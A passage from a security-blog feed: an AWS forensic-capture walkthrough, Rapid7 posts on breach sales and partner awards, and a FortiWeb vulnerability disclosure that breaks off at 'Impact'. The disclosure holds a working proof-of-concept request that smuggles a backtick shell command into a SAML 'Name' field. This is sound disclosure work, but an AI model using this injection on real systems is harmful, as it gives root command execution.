      "Id": "arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
      "ProductArn": "arn:aws:securityhub:us-east-1::product/aws/guardduty",
      "GeneratorId": "arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14",
      "AwsAccountId": "0123456789012",
      "Types": [
        "Effects/Resource Consumption/UnauthorizedAccess:EC2-TorClient"
      ],
      "FirstObservedAt": "2020-10-22T03:52:13.438Z",
      "LastObservedAt": "2020-10-22T03:52:13.438Z",
      "CreatedAt": "2020-10-22T03:52:13.438Z",
      "UpdatedAt": "2020-10-22T03:52:13.438Z",
      "Severity": {
        "Product": 8,
        "Label": "HIGH",
        "Normalized": 60
      },
      "Title": "EC2 instance i-99999999 is communicating with Tor Entry node.",
      "Description": "EC2 instance i-99999999 is communicating with IP address 198.51.100.0 on the Tor Anonymizing Proxy network marked as an Entry node.",
      "SourceUrl": "https://us-east-1.console.aws.amazon.com/guardduty/home?region=us-east-1#/findings?macros=current&fId=b0baa737c3bf7309db2a396651fdb500",
      "ProductFields": {
        "aws/guardduty/service/action/networkConnectionAction/remotePortDetails/portName": "HTTP",
        "aws/guardduty/service/archived": "false",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/asnOrg": "GeneratedFindingASNOrg",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/Geolocation/lat": "0",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/ipAddressV4": "198.51.100.0",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/Geolocation/lon": "0",
        "aws/guardduty/service/action/networkConnectionAction/blocked": "false",
        "aws/guardduty/service/action/networkConnectionAction/remotePortDetails/port": "80",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/country/countryName": "GeneratedFindingCountryName",
        "aws/guardduty/service/serviceName": "guardduty",
        "aws/guardduty/service/action/networkConnectionAction/localIpDetails/ipAddressV4": "10.0.0.23",
        "aws/guardduty/service/detectorId": "f2b82a2b2d8d8541b8c6d2c7d9148e14",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/org": "GeneratedFindingORG",
        "aws/guardduty/service/action/networkConnectionAction/connectionDirection": "OUTBOUND",
        "aws/guardduty/service/eventFirstSeen": "2020-10-22T03:52:13.438Z",
        "aws/guardduty/service/eventLastSeen": "2020-10-22T03:52:13.438Z",
        "aws/guardduty/service/evidence/threatIntelligenceDetails.0_/threatListName": "GeneratedFindingThreatListName",
        "aws/guardduty/service/action/networkConnectionAction/localPortDetails/portName": "Unknown",
        "aws/guardduty/service/action/actionType": "NETWORK_CONNECTION",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/city/cityName": "GeneratedFindingCityName",
        "aws/guardduty/service/resourceRole": "TARGET",
        "aws/guardduty/service/action/networkConnectionAction/localPortDetails/port": "39677",
        "aws/guardduty/service/action/networkConnectionAction/protocol": "TCP",
        "aws/guardduty/service/count": "1",
        "aws/guardduty/service/additionalInfo/sample": "true",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/asn": "-1",
        "aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/isp": "GeneratedFindingISP",
        "aws/guardduty/service/evidence/threatIntelligenceDetails.0_/threatNames.0_": "GeneratedFindingThreatName",
        "aws/securityhub/FindingId": "arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
        "aws/securityhub/ProductName": "GuardDuty",
        "aws/securityhub/CompanyName": "Amazon"
      },
      "Resources": [
        {
          "Type": "AwsEc2Instance",
          "Id": "arn:aws:ec2:us-east-1:0123456789012:instance/i-99999999",
          "Partition": "aws",
          "Region": "us-east-1",
          "Tags": {
            "GeneratedFindingInstaceTag7": "GeneratedFindingInstaceTagValue7",
            "GeneratedFindingInstaceTag8": "GeneratedFindingInstaceTagValue8",
            "GeneratedFindingInstaceTag9": "GeneratedFindingInstaceTagValue9",
            "GeneratedFindingInstaceTag1": "GeneratedFindingInstaceValue1",
            "GeneratedFindingInstaceTag2": "GeneratedFindingInstaceTagValue2",
            "GeneratedFindingInstaceTag3": "GeneratedFindingInstaceTagValue3",
            "GeneratedFindingInstaceTag4": "GeneratedFindingInstaceTagValue4",
            "GeneratedFindingInstaceTag5": "GeneratedFindingInstaceTagValue5",
            "GeneratedFindingInstaceTag6": "GeneratedFindingInstaceTagValue6"
          },
          "Details": {
            "AwsEc2Instance": {
              "Type": "m3.xlarge",
              "ImageId": "ami-99999999",
              "IpV4Addresses": [
                "10.0.0.1",
                "198.51.100.0"
              ],
              "IamInstanceProfileArn": "arn:aws:iam::0123456789012:example/instance/profile",
              "VpcId": "GeneratedFindingVPCId",
              "SubnetId": "GeneratedFindingSubnetId",
              "LaunchedAt": "2016-08-02T02:05:06Z"
            }
          }
        }
      ],
      "WorkflowState": "NEW",
      "Workflow": {
        "Status": "NEW"
      },
      "RecordState": "ACTIVE"
    }
    

  2. Navigate to the DiskForensicsInvoke Lambda function and add the GuardDuty event as a test event.
  3. Choose Test. You should see a success for the invocation.
  4. Navigate to the Step Functions workflow to monitor its progress. When the instances have terminated, all of the artifacts should be in the S3 bucket with additional logs in CloudWatch Logs.
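The exact formatting that DiskForensicsInvoke applies is not shown in this post, but as an illustrative sketch, extracting the fields the workflow needs from a finding shaped like the sample above might look like the following. The function name and the output field names are assumptions for illustration, not the solution's actual schema.

```python
def format_finding(finding):
    """Pull the account, Region, instance ID, and incident ID out of a
    Security Hub finding (shape based on the sample GuardDuty event above)."""
    resource = next(r for r in finding["Resources"] if r["Type"] == "AwsEc2Instance")
    arn = resource["Id"]  # arn:aws:ec2:<region>:<account>:instance/<instance-id>
    region, account_id = arn.split(":")[3:5]
    instance_id = arn.rsplit("/", 1)[1]
    # The finding ID ends in .../finding/<id>; that suffix becomes the incident ID.
    incident_id = finding["Id"].rsplit("/", 1)[1]
    return {
        "AwsAccountId": account_id,
        "Region": region,
        "InstanceID": instance_id,
        "IncidentID": incident_id,
    }
```

The returned dictionary corresponds to the per-incident values (account, Region, instance, incident ID) that appear throughout the audit logs shown later in this post.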

Expected outputs

The forensic disk collection pipeline maintains logs of the actions throughout the process, and uploads the final artifacts to the S3 artifact bucket and CloudWatch Logs. This enables security teams to send forensic collection logs to log aggregation tools or service management tools for additional integrations. The expected outputs of the solution are detailed in the following sections, organized by destination.

S3 artifact outputs

The S3 artifact bucket is the final destination for all logs and the raw disk images. For each security incident that triggers the Step Functions workflow, a new folder will be created with the name of the IncidentID. Included in this folder will be the JSON file that triggered the capture operation, the image (dd) files for the volumes, the capture log, and the resources associated with the capture operation, as shown in Figure 5.

Figure 5: Forensic artifacts in the S3 bucket

Forensic Disk Audit log group

The Forensic Disk Audit CloudWatch log group contains a log entry written by the CreateSnapshot Lambda function after the initial snapshots are created. This includes the high-level finding information, as well as the metadata for each snapshot. The log group also records the data for each completed disk collection operation, including all associated resources and the location of the forensic evidence in the S3 bucket. The following event is an example log for a completed capture; note the metadata provided under CapturedSnapshots. Be sure to update the example to use the correct AWS Region, replace the account ID 0123456789012 with the account number of your monitored account, and replace the instance ID i-99999999 with the instance ID you would like to capture.

{
  "AwsAccountId": "0123456789012",
  "Types": [
    "Effects/Resource Consumption/UnauthorizedAccess:EC2-TorClient"
  ],
  "FirstObservedAt": "2020-10-22T03:52:13.438Z",
  "LastObservedAt": "2020-10-22T03:52:13.438Z",
  "CreatedAt": "2020-10-22T03:52:13.438Z",
  "UpdatedAt": "2020-10-22T03:52:13.438Z",
  "Severity": {
    "Product": 8,
    "Label": "HIGH",
    "Normalized": 60
  },
  "Title": "EC2 instance i-99999999 is communicating with Tor Entry node.",
  "Description": "EC2 instance i-99999999 is communicating with IP address 198.51.100.0 on the Tor Anonymizing Proxy network marked as an Entry node.",
  "FindingId": "arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
  "Resource": {
    "Type": "AwsEc2Instance",
    "Arn": "arn:aws:ec2:us-east-1:0123456789012:instance/i-99999999",
    "Id": "i-99999999",
    "Partition": "aws",
    "Region": "us-east-1",
    "Details": {
      "AwsEc2Instance": {
        "Type": "m3.xlarge",
        "ImageId": "ami-99999999",
        "IpV4Addresses": [
          "10.0.0.1",
          "198.51.100.0"
        ],
        "IamInstanceProfileArn": "arn:aws:iam::0123456789012:example/instance/profile",
        "VpcId": "GeneratedFindingVPCId",
        "SubnetId": "GeneratedFindingSubnetId",
        "LaunchedAt": "2016-08-02T02:05:06Z"
      }
    }
  },
  "EvidenceBucket": "forensic-artifact-bucket",
  "IncidentID": "b0baa737c3bf7309db2a396651fdb500",
  "CapturedSnapshots": [
    {
      "SourceSnapshotID": "snap-99999999",
      "SourceVolumeID": "vol-99999999",
      "SourceDeviceName": "/dev/xvda",
      "VolumeSize": 100,
      "InstanceID": "i-99999999",
      "FindingID": "arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
      "IncidentID": "b0baa737c3bf7309db2a396651fdb500",
      "AccountID": "0123456789012",
      "Region": "us-east-1",
      "EvidenceBucket": "forensic-artifact-bucket"
    }
  ]
}
{
  "SourceSnapshotID": "snap-99999999",
  "SourceVolumeID": "vol-99999999",
  "SourceDeviceName": "/dev/sdd",
  "VolumeSize": 100,
  "InstanceID": "i-99999999",
  "FindingID": "arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
  "IncidentID": "b0baa737c3bf7309db2a396651fdb500",
  "AccountID": "0123456789012",
  "Region": "us-east-1",
  "EvidenceBucket": "forensic-artifact-bucket",
  "CopiedSnapshotID": "snap-99999998",
  "EncryptionKey": "arn:aws:kms:us-east-1:0123456789012:key/e793cbd3-ce6a-4b17-a48f-7e78984346f2",
  "FinalCopiedSnapshotID": "snap-99999997",
  "ForensicVolumeID": "vol-99999998",
  "VolumeAZ": "us-east-1a",
  "ForensicInstances": [
    "i-99999998"
  ],
  "DiskImageLocation": "s3://forensic-artifact-bucket/b0baa737c3bf7309db2a396651fdb500/disk_evidence/vol-99999999.image.dd"
}

Forensic Disk Capture log group

The Forensic Disk Capture CloudWatch log group contains the logs from the EC2Collector VM. These logs detail the operations the instance performs, including when the dc3dd command was executed, the transfer speed to the S3 bucket, the hash of the volume, and how long the total operation took to complete. The log example in Figure 6 shows the output of the disk capture on the collector instance.

Figure 6: Forensic Disk Capture logs

Cost and capture times

This solution may save you money over a traditional system that requires bastion hosts (jump boxes) and forensic instances to be readily available. With AWS, you pay only for the individual services you need, for as long as you use them. The cost of this solution is minimal, because charges are only incurred based on the logs or artifacts that you store in CloudWatch or Amazon S3, and the invocation of the Step Functions workflow. Additionally, resources such as the collectorVM are only created and used when needed.

This solution can also save you time. If an analyst were to work through this workflow manually, it could take significantly longer than the automated solution. The following are some example collection times. Even as the manual workflow time increases, the automated workflow time stays the same, because of how the solution scales.

Scenario 1: EC2 instance with one 8GB volume

  • Automated workflow: 11 minutes
  • Manual workflow: 15 minutes

Scenario 2: EC2 instance with four 8GB volumes

  • Automated workflow: 11 minutes
  • Manual workflow: 1 hour 10 minutes

Scenario 3: Four EC2 instances with one 8GB volume each

  • Automated workflow: 11 minutes
  • Manual workflow: 1 hour 20 minutes

Clean up and delete artifacts

To clean up the artifacts from the solution in this post, first delete all information in your artifact S3 bucket. Then delete the diskForensics stack, followed by the diskForensicImageBuilder stack, and finally the diskMember stack. You must also manually delete any EBS volumes or EBS snapshots created by the pipeline; these are not deleted automatically. Likewise, manually delete the AMI and images that are created and published by Image Builder.

Considerations

This solution covers EBS volume storage as the target for forensic disk capture. If your instances use Amazon EC2 instance store volumes, you cannot snapshot and copy them, because instance store data is not included in a snapshot operation. Instead, consider running the commands included in the collector.sh script with AWS Systems Manager. The collector.sh script is included in the Image Builder recipe and uses dc3dd to stream a copy of the volume to Amazon S3.
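A hedged sketch of that instance store approach using Systems Manager Run Command follows. The function names are not part of the solution, and the dc3dd pipeline is illustrative (not the verbatim contents of collector.sh); it assumes the instance has an SSM agent, the AWS CLI, dc3dd, and S3 write permissions.

```python
def build_capture_command(device, bucket, incident_id, volume_label):
    """Illustrative shell pipeline: stream a bit-for-bit copy of a device to S3
    with dc3dd, hashing as it goes. Flags and paths are examples only."""
    image = f"{volume_label}.image.dd"
    return (
        f"dc3dd if={device} hash=md5 log=/tmp/{image}.log "
        f"| aws s3 cp - s3://{bucket}/{incident_id}/disk_evidence/{image}"
    )

def capture_instance_store(instance_id, device, bucket, incident_id, volume_label):
    """Run the capture on the instance itself through Systems Manager,
    since instance store data cannot be captured via snapshots."""
    import boto3  # deferred so build_capture_command stays usable without AWS access
    ssm = boto3.client("ssm")
    return ssm.send_command(
        InstanceIds=[instance_id],
        DocumentName="AWS-RunShellScript",  # AWS-managed SSM document
        Parameters={
            "commands": [build_capture_command(device, bucket, incident_id, volume_label)]
        },
    )
```

Note that capturing a live volume this way is not equivalent to the snapshot-based workflow: the data is read from a running system, so the image reflects the volume at read time rather than a crash-consistent snapshot.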

Conclusion

Having this solution in place across your AWS accounts will enable fast response times to security events, because it helps ensure that forensic artifacts are collected and stored as quickly as possible. Download the .zip file containing the CloudFormation solutions so that you can deploy this solution and get started on your own forensic automation workflows. For talks describing this solution, see the video of SEC306 from re:Invent 2020 and the AWS Online Tech Talk AWS Digital Forensics Automation at Goldman Sachs.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Amazon GuardDuty forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Matt Duda

Matt is a Senior Cloud Security Architect with AWS Professional Services. He has an extensive background in cybersecurity in the financial services sector. He is obsessed with helping customers improve their ability to prevent, prepare for, and respond to potential security events in AWS, utilizing automation wherever possible.

Contributor

Special thanks to Logan Bair who made significant contributions to this post.

Cybercriminals Selling Access to Compromised Networks: 3 Surprising Research Findings

Post Syndicated from Paul Prudhomme original https://blog.rapid7.com/2021/08/24/cybercriminals-selling-access-to-compromised-networks-3-surprising-research-findings/

Cybercriminals Selling Access to Compromised Networks: 3 Surprising Research Findings

Cybercriminals are innovative, always finding ways to adapt to new circumstances and opportunities. The proof of this can be seen in the rise of a certain variety of activity on the dark web: the sale of access to compromised networks.

This type of dark web activity has existed for decades, but it matured and began to truly thrive amid the COVID-19 global pandemic. The worldwide shift to a remote workforce gave cybercriminals more attack surface to exploit, which fueled sales on underground criminal websites, where buyers and sellers transfer network access to compromised enterprises and organizations to turn a profit.

Having witnessed this sharp rise in breach sales in the cybercriminal ecosystem, IntSights, a Rapid7 company, decided to analyze why and how criminals sell their network access, with an eye toward understanding how to prevent these network compromise events from happening in the first place.

We have compiled our network compromise research, as well as our prevention and mitigation best practices, in the brand-new white paper “Selling Breaches: The Transfer of Enterprise Network Access on Criminal Forums.”

During the process of researching and analyzing, we came across three surprising findings we thought worth highlighting. For a deeper dive, we recommend reading the full white paper, but let’s take a quick look at these discoveries here.

1. The massive gap between average and median breach sales prices

As part of our research, we took a close look at the pricing characteristics of breach sales in the criminal-to-criminal marketplace. Unsurprisingly, pricing varied considerably from one sale to another. A number of factors can influence pricing, including everything from the level of access provided to the value of the victim as a source of criminal revenue.

That said, we found an unexpectedly significant discrepancy between the average price and the median price across the 40 sales we analyzed. The average price came out to approximately $9,640 USD, while the median price was $3,000 USD.

In part, this gap can be attributed to a few unusually high prices among the most expensive offerings. The lowest price in our dataset was $240 USD for access to a healthcare organization in Colombia, but healthcare pricing tends to trend lower than other industries, with a median price of $700 in this sample. On the other end of the spectrum, the highest price was for a telecommunications service provider that came in at about $95,000 USD worth of Bitcoin.

Because of this discrepancy, IntSights researchers view the average price of $9,640 USD as a better indicator of the higher end of the price range, while the median price is more representative of typical pricing for these sales — $3,000 USD was also the single most common price. Nonetheless, it was fascinating to discover this difference and dig into the reasons behind it.
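The mean-versus-median gap is easy to reproduce: a single expensive outlier drags the arithmetic mean well above the median, while the median stays at the typical price. The sample below uses illustrative stand-in prices shaped like the dataset described above, not the actual research data.

```python
import statistics

# Illustrative, skewed sample: mostly typical prices plus one expensive outlier,
# mirroring the shape of the breach-sale pricing described above.
prices_usd = [240, 700, 3000, 3000, 3000, 4500, 95000]

mean_price = statistics.mean(prices_usd)      # pulled far upward by the $95,000 outlier
median_price = statistics.median(prices_usd)  # the "typical" sale price
```

This is why the research treats the median as representative of typical pricing and the mean as an indicator of the market's high end.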

2. The numerical dominance of tech and telecoms victims

While the sales of network access are a cross-industry phenomenon, technology and telecommunications companies are the most common victims. Not only are they frequent targets, but their compromised access also commands some of the highest prices on the market.

In our sample, tech and telecoms represented 10 of the 46 victims, or 22% of those affected by industry. Out of the 10 most expensive offerings we analyzed, four were for tech and telecommunications organizations, and there were only two that had prices under $10,000 USD. A telecommunications service provider located in an unspecified Asian country also had the single most expensive offering in this sample at approximately $95,000 USD.

After investigating the reasoning behind this numerical dominance, IntSights researchers believe that the high value and high number of tech and telecommunications companies as breach victims stem from their usefulness in enabling further attacks on other targets. For example, a cybercriminal who gains access to a mobile service provider could conduct SIM swapping attacks on digital banking customers who use two-factor authentication via SMS.

These pricing standards were surprisingly expensive compared to other industries, but for good reason: the investment may cost more upfront but prove more lucrative in the long run.

3. The low proportion of retail and hospitality victims

As previously mentioned, we broke down the sales of network access based on the industries affected, and to our surprise, only 6.5% of victims were in retail and hospitality. This seemed odd, considering the popularity of the industry as a target for cybercrime. Think of all the headlines in the news about large retail companies falling victim to a breach that exposed millions of customer credentials.

We explored the reasoning behind this low proportion of victims in the space and came to a few conclusions. For example, we theorized that the main customers for these network access sales are ransomware operators, not payment card data collectors. Payment card data collection is likely a more optimal way to monetize access to a retail or hospitality business, whereas putting ransomware on a retail and hospitality network would actually “kill the goose that lays the golden eggs.”

We also found that the second-most expensive offering in this sample was for access to an organization supporting retail and hospitality businesses. The victim was a third party managing customer loyalty and rewards programs, and the seller highlighted how a buyer could monetize this indirect access to its retail and hospitality customer base. This victim may have been more valuable because, among other things, loyalty and rewards programs are softer targets with weaker security than credit cards and bank accounts; thus, they’re easier to defraud.

Learn more about compromised network access sales

Curious to learn more about the how and why of cybercriminals selling compromised network access? Read our white paper, Selling Breaches: The Transfer of Enterprise Network Access on Criminal Forums, for the full story behind this research and how it can inform your security efforts.

[The Lost Bots] Bonus Episode: Velociraptor Contributor Competition

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/08/23/the-lost-bots-bonus-episode-velociraptor-contributor-competition/

[The Lost Bots] Bonus Episode: Velociraptor Contributor Competition

Welcome back for a special bonus edition of The Lost Bots, a vlog series where Rapid7 Detection and Response Practice Advisor Jeffrey Gardner talks all things security with fellow industry experts. In this extra installment, Jeffrey chats with Mike Cohen, Digital Paleontologist for Velociraptor, an open source endpoint visibility tool that Rapid7 acquired earlier this year.

Mike fills us in on Velociraptor’s very first Contributor Competition, a friendly hackathon-style event that invites entrants to get their hands dirty and build the best extension to the Velociraptor platform that they can. Check out the episode to hear more about the competition, who’s judging, what they’re looking for, and what’s coming your way if you win — spoiler: there’s a cool $5,000 waiting for you if you nab the No. 1 spot, plus a range of other monetary and merchandise prizes. Jeffrey himself even plans to throw his hat in the ring!




Stay tuned for future episodes of The Lost Bots! And don’t forget to start working on your entry for the 2021 Velociraptor Contributor Competition.

Rapid7 Announces Partner of the Year Awards 2021 Winners

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/08/19/rapid7-announces-partner-of-the-year-awards-2021-winners/

Rapid7 Announces Partner of the Year Awards 2021 Winners

Over the past year and more, we’ve lived through the most extraordinary, turbulent, and challenging times we’ll likely experience in our lifetime. Yet through all the uncertainty, our partners have continued to show determination, drive, and commitment, performing at an exceptional level.

With this said, it’s with immense pleasure that we announce today the winners of the Rapid7 Partner of the Year Awards 2021. All our category winners have achieved exceptional growth, demonstrating dedication and collaboration throughout the year as members of the Rapid7 Partner Program.

We’re very proud to share our complete list of winners. Please join us in congratulating them all.

International Awards

EMEA Partner of the Year: Softcat Plc

APAC Partner of the Year: Intalock Technologies Pty Ltd

International Emerging Partner of the Year: Caretower Ltd

International Best Customer Retention Award: Saepio Solutions Ltd

APAC Vulnerability Management Partner of the Year: RIoT Solutions

EMEA Vulnerability Management Partner of the Year: Orange Cyberdefense Sweden

APAC Detection & Response Partner of the Year: The Missing Link

EMEA Detection & Response Partner of the Year: Saepio Solutions Ltd

APAC MSSP Partner of the Year: Triskele Labs

EMEA MSSP Partner of the Year: Charterhouse Voice and Data

“We are proud of the relationship we have built with Rapid7 over the last two years, and they have become one of our key focus partners. To be awarded EMEA MSSP Partner of the Year in such a short space of time is a testament to our technical team and our commitment to Rapid7. As an integral component of our state-of-the-art Security Operations Centre, we only see this relationship going from strength to strength.”

North America Awards

Rapid7 North America Partner of the Year: SHI International Corporation

“Thank you so much. With Rapid7 being a strategic security partner to SHI, we are excited to be receiving this award. I feel that this highlights the excellent relationship that we have, as well as some really great engagement we’ve seen between our sales teams.  Security is an extremely important industry to SHI and our mutual customers. I am confident we will continue to see success when positioning Rapid7 solutions.”

– Joseph Lentine, Director – Strategic Software Partners, Security

North America Emerging Partner of the Year: GDT

North America Best Customer Retention Award: Optiv

North America Vulnerability Management Partner of the Year: GuidePoint Security

North America Detection & Response Partner of the Year: Sayers

“Being selected for this award is a special honor for Sayers. Ransomware preparedness is a cornerstone of the Sayers Cybersecurity Services portfolio.  We couldn’t be more impressed with the professionalism and cutting-edge technology Rapid7 brings to the market.  It was an easy decision to partner with Rapid7 for our Sayers Managed Detection & Response service offering.”

– Joel Grace, Sr. VP of Client Services

North America MSSP Partner of the Year: Edge Communications

“Edge Communications is honored to be named the Rapid7 North America MSSP Partner of the Year for 2020.

“Edge is proud of the strong collaborative relationship that we have developed with Rapid7, a cybersecurity industry leader. Edge delivers one of the best Managed Security solutions available in the marketplace, due in part to utilizing Rapid7 products, which we believe exceed the best-in-class designation. On behalf of the entire Edge team, thank you Rapid7 for your support, dedication, and partnership.”

– Frank Pallone, VP Information Security

Congratulations again to all our winners!

More about our partner program

The Rapid7 PACT Program is built to inspire our partners to grow with us and achieve mutual success through accountability, consistency, and transparency. By participating in the program, partners can offer powerful, industry-leading solutions to our joint customers, resulting in mutual success for all.

If you’re interested in becoming a Rapid7 partner, you can learn more here.

Fortinet FortiWeb OS Command Injection

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/08/17/fortinet-fortiweb-os-command-injection/

Fortinet FortiWeb OS Command Injection

An OS command injection vulnerability in FortiWeb’s management interface (version 6.3.11 and prior) can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page. This is an instance of CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) and has a CVSSv3 base score of 8.7. This vulnerability appears to be related to CVE-2021-22123, which was addressed in FG-IR-20-120.

Product Description

Fortinet FortiWeb is a web application firewall (WAF), designed to catch both known and unknown exploits targeting the protected web applications before they have a chance to execute. More about FortiWeb can be found at the vendor’s website.

Credit

This issue was discovered by researcher William Vu of Rapid7. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

An attacker who is first authenticated to the management interface of the FortiWeb device can smuggle commands using backticks in the “Name” field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system. The affected code is noted below:

int move_metafile(char *path, char *name)
{
    int iVar1;
    char buf[512];
    int nret;

    snprintf(buf, 0x200, "%s/%s", "/data/etc/saml/shibboleth/service_providers", name);
    iVar1 = access(buf, 0);
    if (iVar1 != 0) {
        /* `name` is attacker-controlled and interpolated, unsanitized, into a shell command */
        snprintf(buf, 0x200, "mkdir %s/%s", "/data/etc/saml/shibboleth/service_providers", name);
        iVar1 = system(buf);
        if (iVar1 != 0) {
            return iVar1;
        }
    }
    snprintf(buf, 0x200, "cp %s %s/%s/%s.%s", path, "/data/etc/saml/shibboleth/service_providers", name,
             "Metadata", &DAT_00212758);
    iVar1 = system(buf);
    return iVar1;
}

The HTTP POST request and response below demonstrates an example exploit of this vulnerability:

POST /api/v2.0/user/remoteserver.saml HTTP/1.1
Host: [redacted]
Cookie: [redacted]
User-Agent: [redacted]
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[redacted]/root/user/remote-user/saml-user/
X-Csrftoken: 814940160
Content-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412
Content-Length: 3068
Origin: https://[redacted]
Dnt: 1
Te: trailers
Connection: close
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="q_type"
1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="name"
`touch /tmp/vulnerable`
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="entityID"
test
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="service-path"
/saml.sso
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="session-lifetime"
8
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="session-timeout"
30
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-bind"
post
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-bind_val"
1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-path"
/SAML2/POST
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-bind"
post
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-bind_val"
1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-path"
/SLO/POST
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="flag"
0
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="enforce-signing"
disable
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="enforce-signing_val"
0
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="metafile"; filename="test.xml"
Content-Type: text/xml
<?xml version="1.0"?>
<md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" validUntil="2021-06-12T16:54:31Z" cacheDuration="PT1623948871S" entityID="test">
<md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
<md:KeyDescriptor use="signing">
<ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:X509Data>
<ds:X509Certificate>test</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</md:KeyDescriptor>
<md:KeyDescriptor use="encryption">
<ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:X509Data>
<ds:X509Certificate>test</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</md:KeyDescriptor>
<md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat>
<md:SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="test"/>
</md:IDPSSODescriptor>
</md:EntityDescriptor>
-----------------------------94351131111899571381631694412--
HTTP/1.1 500 Internal Server Error
Date: Thu, 10 Jun 2021 11:59:45 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Set-Cookie: [redacted]
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: frame-ancestors 'self'
X-Content-Type-Options: nosniff
Content-Length: 20
Strict-Transport-Security: max-age=63072000
Connection: close
Content-Type: application/json
{"errcode": "-651"}

Note how the smuggled ‘touch’ command is concatenated into the mkdir shell command:

[pid 12867] execve("/migadmin/cgi-bin/fwbcgi", ["/migadmin/cgi-bin/fwbcgi"], 0x55bb0395bf00 /* 42 vars */) = 0
[pid 13934] execve("/bin/sh", ["sh", "-c", "mkdir /data/etc/saml/shibboleth/service_providers/`touch /tmp/vulnerable`"], 0x7fff56b1c608 /* 42 vars */) = 0
[pid 13935] execve("/bin/touch", ["touch", "/tmp/vulnerable"], 0x55774aa30bf8 /* 44 vars */) = 0
[pid 13936] execve("/bin/mkdir", ["mkdir", "/data/etc/saml/shibboleth/service_providers/"], 0x55774aa30be8 /* 44 vars */) = 0

Finally, the results of the ‘touch’ command can be seen on the local command line of the FortiWeb device:

/# ls -l /tmp/vulnerable
-rw-r--r--    1 root     0                0 Jun 10 11:59 /tmp/vulnerable
/#
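The chain above boils down to a familiar bug class: untrusted input interpolated into a string handed to `system()`. As a minimal, illustrative Python sketch (not FortiWeb’s actual code — the path constant is borrowed from the decompilation above), the difference between the vulnerable pattern and the shell-free fix looks like this:

```python
# Illustrative only: mirrors the snprintf + system() pattern shown above.
BASE = "/data/etc/saml/shibboleth/service_providers"

def shell_command(name: str) -> str:
    # Vulnerable: if this string is handed to a shell, the shell evaluates
    # `...` (command substitution) in `name` before mkdir ever runs,
    # e.g. name = "`touch /tmp/vulnerable`".
    return f"mkdir {BASE}/{name}"

def safe_argv(name: str) -> list:
    # Fix: build an argument vector (execve-style) and never invoke a
    # shell, so backticks in `name` are just literal filename characters.
    return ["mkdir", "-p", f"{BASE}/{name}"]
```

Running `subprocess.run(safe_argv(name))` executes mkdir directly with no shell in between, which is the standard remediation for CWE-78.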

Impact

